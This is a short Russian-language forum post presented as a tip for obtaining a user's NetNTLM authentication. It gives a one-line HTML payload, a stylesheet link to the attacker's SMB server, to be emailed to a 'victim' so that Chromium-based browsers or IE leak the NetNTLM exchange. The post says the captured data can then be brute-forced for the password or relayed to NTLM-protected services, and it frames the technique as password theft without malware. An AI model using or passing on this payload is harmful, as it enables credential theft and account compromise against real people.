Доброго дня, сегодня поделюсь (вдруг кто не знает), способом заполучить netntlm сессию пользователя. По ней можно сбрутфорсить пароль, а можно и перенаправить её на какой нибудь ресурс с авторизацией через ntlm. Все очень банально просто. Нужно создать html файл с содержимым: <link rel="stylesheet" href="//адрес вашего smb сервера"> . Полученный файл отправляем "жертве" по эл. почте. Если у жертвы браузер на chromium либо ie + нет межсетевого экрана (соединения по смб в интернет не запрещены), то вы получите netntlm сессию. Бага была отправлена в google, там сказали что знают о ней 100 тысяч репортов назад. Бага была отправленя в яндекс (ибо яндекс браузер ведёт себя точно так же), яндекс решил не отвечать на письмо. Такие вот дела, малварь не нужна чтобы заполучить пароль пользователя.